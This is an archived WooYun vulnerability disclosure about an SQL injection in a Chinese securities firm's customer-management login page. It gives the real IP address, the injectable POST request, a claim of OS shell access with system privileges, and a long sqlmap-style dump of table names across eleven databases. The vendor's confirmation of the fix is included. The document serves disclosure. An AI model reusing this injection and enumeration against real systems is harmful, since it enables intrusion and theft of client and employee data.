当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142546

漏洞标题:国海证券某客户系统存在sql注入可导致11个数据库以及大量信息泄漏可执行os-shell内网

相关厂商:国海证券

漏洞作者: 路人甲

提交时间:2015-09-21 13:23

修复时间:2015-10-09 10:01

公开时间:2015-10-09 10:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-21: 细节已通知厂商并且等待厂商处理中
2015-09-21: 厂商已经确认,细节仅向厂商公开
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-09: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

可导致11个数据库以及大量信息泄漏

详细说明:

国海证券客户管理
http://58.60.191.91:88/index.asp
post注入
http://58.60.191.91:88/index.asp
(POST)
userid=admin&password=123456&Submit=%B5%C7%C2%BC

2.jpg


可执行os-shell 系统权限

1.jpg


看下大量表信息

Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: zxnews
[41 tables]
+--------------------------------------------+
| Category                                   |
| Discuss2                                   |
| Discuss2                                   |
| News                                       |
| Users                                      |
| cpfw                                       |
| dhjl                                       |
| dtproperties                               |
| ggnews                                     |
| gpc                                        |
| gzdg                                       |
| jgkhb                                      |
| jgxsb_kh                                   |
| jjfw                                       |
| jljl                                       |
| jrgc                                       |
| jx                                         |
| jxxxx                                      |
| khtxl                                      |
| mtfb                                       |
| ptjl                                       |
| spzx                                       |
| sysconstraints                             |
| syssegments                                |
| xzbm                                       |
| xzgz                                       |
| yjbg                                       |
| yjshd                                      |
| yjsjlsjk                                   |
| yjy_js_pgb2                                |
| yjy_js_pgb_2                               |
| yjy_js_pgb_2                               |
| yjy_kh_2014_07_2                           |
| yjy_kh_2014_07_2                           |
| yjy_kh_999                                 |
| yjy_tjb_ch                                 |
| yjy_tjb_ch                                 |
| yjy_tjb_cpfw                               |
| yjy_tjb_dy                                 |
| yjy_tjb_mt                                 |
| yjy_tjb_yjbg                               |
+--------------------------------------------+
Database: msdb
[83 tables]
+--------------------------------------------+
| RTblClassDefs                              |
| RTblClassExtension                         |
| RTblDBMProps                               |
| RTblDBXProps                               |
| RTblDTMProps                               |
| RTblDTSProps                               |
| RTblDatabaseVersion                        |
| RTblEQMProps                               |
| RTblEnumerationDef                         |
| RTblEnumerationValueDef                    |
| RTblGENProps                               |
| RTblIfaceDefs                              |
| RTblIfaceHier                              |
| RTblIfaceMem                               |
| RTblMDSProps                               |
| RTblNamedObj                               |
| RTblOLPProps                               |
| RTblParameterDef                           |
| RTblPropDefs                               |
| RTblProps                                  |
| RTblRelColDefs                             |
| RTblRelshipDefs                            |
| RTblRelshipProps                           |
| RTblRelships                               |
| RTblSIMProps                               |
| RTblScriptDefs                             |
| RTblSites                                  |
| RTblSumInfo                                |
| RTblTFMProps                               |
| RTblTypeInfo                               |
| RTblTypeLibs                               |
| RTblUMLProps                               |
| RTblUMXProps                               |
| RTblVersionAdminInfo                       |
| RTblVersions                               |
| RTblWorkspaceItems                         |
| backupfile                                 |
| backupmediafamily                          |
| backupmediaset                             |
| backupset                                  |
| log_shipping_databases                     |
| log_shipping_monitor                       |
| log_shipping_plan_databases                |
| log_shipping_plan_history                  |
| log_shipping_plans                         |
| log_shipping_primaries                     |
| log_shipping_secondaries                   |
| logmarkhistory                             |
| mswebtasks                                 |
| restorefilegroup                           |
| restorefilegroup                           |
| restorehistory                             |
| sqlagent_info                              |
| sysalerts                                  |
| syscachedcredentials                       |
| syscategories                              |
| sysconstraints                             |
| sysdbmaintplan_databases                   |
| sysdbmaintplan_history                     |
| sysdbmaintplan_jobs                        |
| sysdbmaintplans                            |
| sysdownloadlist                            |
| sysdtscategories                           |
| sysdtspackagelog                           |
| sysdtspackages                             |
| sysdtssteplog                              |
| sysdtstasklog                              |
| sysjobhistory                              |
| sysjobs_view                               |
| sysjobs_view                               |
| sysjobschedules                            |
| sysjobservers                              |
| sysjobsteps                                |
| sysnotifications                           |
| sysoperators                               |
| syssegments                                |
| systargetservergroupmembers                |
| systargetservergroups                      |
| systargetservers_view                      |
| systargetservers_view                      |
| systaskids                                 |
| systasks_view                              |
| systasks_view                              |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| authors                                    |
| discounts                                  |
| employee                                   |
| jobs                                       |
| pub_info                                   |
| publishers                                 |
| roysched                                   |
| sales                                      |
| stores                                     |
| sysconstraints                             |
| syssegments                                |
| titleauthor                                |
| titles                                     |
| titleview                                  |
+--------------------------------------------+
Database: kq
[45 tables]
+--------------------------------------------+
| ACGroup                                    |
| ACTimeZones                                |
| ACUnlockComb                               |
| AUTHDEVICE                                 |
| AlarmLog                                   |
| AttParam                                   |
| AuditedExc                                 |
| CHECKEXACT                                 |
| CHECKINOUT                                 |
| DEPARTMENTS                                |
| DeptUsedSchs                               |
| EXCNOTES                                   |
| EmOpLog                                    |
| FaceTemp                                   |
| HOLIDAYS                                   |
| LeaveClass1                                |
| LeaveClass1                                |
| Machines                                   |
| NUM_RUN_DEIL                               |
| NUM_RUN_DEIL                               |
| ReportItem                                 |
| SECURITYDETAILS                            |
| SHIFT                                      |
| SchClass                                   |
| ServerLog                                  |
| SystemLog                                  |
| TBKEY                                      |
| TBSMSALLOT                                 |
| TBSMSINFO                                  |
| TEMPLATE                                   |
| USERINFO                                   |
| USER_OF_RUN                                |
| USER_SPEDAY                                |
| USER_TEMP_SCH                              |
| UserACMachines                             |
| UserACPrivilege                            |
| UserUpdates                                |
| UserUsedSClasses                           |
| UsersMachines                              |
| dtproperties                               |
| jx_kq_9                                    |
| jx_kq_9                                    |
| loucheng                                   |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS       |
| INFORMATION_SCHEMA.COLUMNS                 |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES       |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE  |
| INFORMATION_SCHEMA.DOMAINS                 |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS      |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE        |
| INFORMATION_SCHEMA.PARAMETERS              |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES                |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS         |
| INFORMATION_SCHEMA.SCHEMATA                |
| INFORMATION_SCHEMA.TABLES                  |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES        |
| INFORMATION_SCHEMA.VIEWS                   |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE       |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE        |
| MSreplication_options                      |
| spt_datatype_info_ext                      |
| spt_datatype_info_ext                      |
| spt_fallback_db                            |
| spt_fallback_dev                           |
| spt_fallback_usg                           |
| spt_monitor                                |
| spt_provider_types                         |
| spt_server_info                            |
| spt_values                                 |
| sysconstraints                             |
| syslogins                                  |
| sysoledbusers                              |
| sysopentapes                               |
| sysremotelogins                            |
| syssegments                                |
+--------------------------------------------+
Database: jjtj_yyb
[21 tables]
+--------------------------------------------+
| Departments_yyb9                           |
| Departments_yyb9                           |
| Departments_yyb9                           |
| Departments_yybcx2                         |
| Departments_yybcx9                         |
| Departments_yybcx_3                        |
| Departments_yybcx_3                        |
| Dkhcategory3                               |
| dtproperties                               |
| gzr                                        |
| jhlc_cp_k                                  |
| jjxs_dj_DE0002                             |
| jjxs_dj_DE0002                             |
| jjxs_dt                                    |
| jxzxx1                                     |
| jxzxx1                                     |
| jxzxx3                                     |
| sysconstraints                             |
| syssegments                                |
| table1                                     |
| table2                                     |
+--------------------------------------------+
Database: news
[93 tables]
+--------------------------------------------+
| Category                                   |
| DepTrans                                   |
| Departments                                |
| Discuss2                                   |
| Discuss2                                   |
| Dkhcategory3                               |
| Dkhcategory_gzbg                           |
| Dkhcategory_gzbg                           |
| Dkhnews                                    |
| Dkhusers_2                                 |
| Dkhusers_2                                 |
| Employees                                  |
| Evaluation                                 |
| News                                       |
| Salary2                                    |
| Salary2                                    |
| SalaryItem2                                |
| SalaryItem_phgx                            |
| SalaryItem_phgx                            |
| SalaryStatistics                           |
| SaleChance                                 |
| SaleTask                                   |
| TaxRate                                    |
| Users                                      |
| bm                                         |
| dkhDiscuss3                                |
| dkhDiscuss_khfx                            |
| dkhDiscuss_khfx                            |
| dkhDiscusshz                               |
| dkhDiscussjj3                              |
| dkhcategort                                |
| dtproperties                               |
| ggNews                                     |
| gpc2                                       |
| gpc_th10                                   |
| gpc_th10                                   |
| gpc_th10                                   |
| gpc_th11                                   |
| gpc_th2                                    |
| gpc_th3                                    |
| gpc_th4                                    |
| gpc_th5                                    |
| gpc_th6                                    |
| gpc_th7                                    |
| gpc_th8                                    |
| gpc_th9                                    |
| gzb_cx                                     |
| gzb_ps                                     |
| gzbgsjk2                                   |
| gzbgsjk_gs                                 |
| gzbgsjk_gs                                 |
| gzts                                       |
| jjccsjk                                    |
| jjdkh                                      |
| jjsjk                                      |
| jx_tmp1                                    |
| jx_tmp1                                    |
| jx_tmp1                                    |
| jx_tmp2                                    |
| jyyjcate                                   |
| jyyjcate                                   |
| lxcl                                       |
| mbgl2                                      |
| mbgl2                                      |
| mbglDiscuss2                               |
| mbglDiscuss2                               |
| nzjj                                       |
| nzjjsjk                                    |
| rlzy_gzxm                                  |
| rlzy_sbxm_phgx                             |
| rlzy_sbxm_phgx                             |
| saleDiscuss                                |
| sb_200803                                  |
| sbjs                                       |
| sbsjk                                      |
| sf                                         |
| sysconstraints                             |
| syssegments                                |
| thccsjk                                    |
| thccsqsjk20081231                          |
| thccsqsjk20081231                          |
| thdkh                                      |
| thsjk                                      |
| v_Sts2                                     |
| v_Sts_bf                                   |
| v_Sts_bf                                   |
| wcmxsjk                                    |
| yjsjlsjk                                   |
| ywxtgwlz                                   |
| ywxtgwlz                                   |
| zcbCategory                                |
| zcbNews                                    |
| zcbly                                      |
+--------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------+
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories                                 |
| CustomerCustomerDemo                       |
| CustomerDemographics                       |
| Customers                                  |
| EmployeeTerritories                        |
| Employees                                  |
| Invoices                                   |
| Region                                     |
| Shippers                                   |
| Suppliers                                  |
| Territories                                |
| Alphabetical list of products              |
| Category Sales for 1997                    |
| Current Product List                       |
| Customer and Suppliers by City             |
| Order Details Extended                     |
| Order Details Extended                     |
| Order Subtotals                            |
| Orders Qry                                 |
| Orders Qry                                 |
| Product Sales for 1997                     |
| Products Above Average Price               |
| Products Above Average Price               |
| Products by Category                       |
| Quarterly Orders                           |
| Sales Totals by Amount                     |
| Sales by Category                          |
| Summary of Sales by Quarter                |
| Summary of Sales by Year                   |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: kaoqin
[45 tables]
+--------------------------------------------+
| ACGroup                                    |
| ACTimeZones                                |
| ACUnlockComb                               |
| AUTHDEVICE                                 |
| AlarmLog                                   |
| AttParam                                   |
| AuditedExc                                 |
| CHECKEXACT                                 |
| CHECKINOUT                                 |
| DEPARTMENTS                                |
| DeptUsedSchs                               |
| EXCNOTES                                   |
| EmOpLog                                    |
| FaceTemp                                   |
| HOLIDAYS                                   |
| LeaveClass1                                |
| LeaveClass1                                |
| Machines                                   |
| NUM_RUN_DEIL                               |
| NUM_RUN_DEIL                               |
| ReportItem                                 |
| SECURITYDETAILS                            |
| SHIFT                                      |
| SchClass                                   |
| ServerLog                                  |
| SystemLog                                  |
| TBKEY                                      |
| TBSMSALLOT                                 |
| TBSMSINFO                                  |
| TEMPLATE                                   |
| USERINFO                                   |
| USER_OF_RUN                                |
| USER_SPEDAY                                |
| USER_TEMP_SCH                              |
| UserACMachines                             |
| UserACPrivilege                            |
| UserUpdates                                |
| UserUsedSClasses                           |
| UsersMachines                              |
| dtproperties                               |
| gzr2                                       |
| gzr2                                       |
| jx_kq                                      |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+


内网多数机器可进一步渗透

3.jpg

漏洞证明:

3.jpg

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-09-21 14:04

厂商回复:

本系统属于老的业务系统,准备下线

最新状态:

2015-09-25:漏洞已修复完成

2015-10-09:漏洞已修复,谢谢!

漏洞评价:

评论

  1. 2015-09-21 14:10 | Martial ( 普通白帽子 | Rank:861 漏洞数:148 )

    @国海证券 厂商看问题不能看这么片面,该系统虽然是老系统,但是放在内网中,很容易就撸内网了~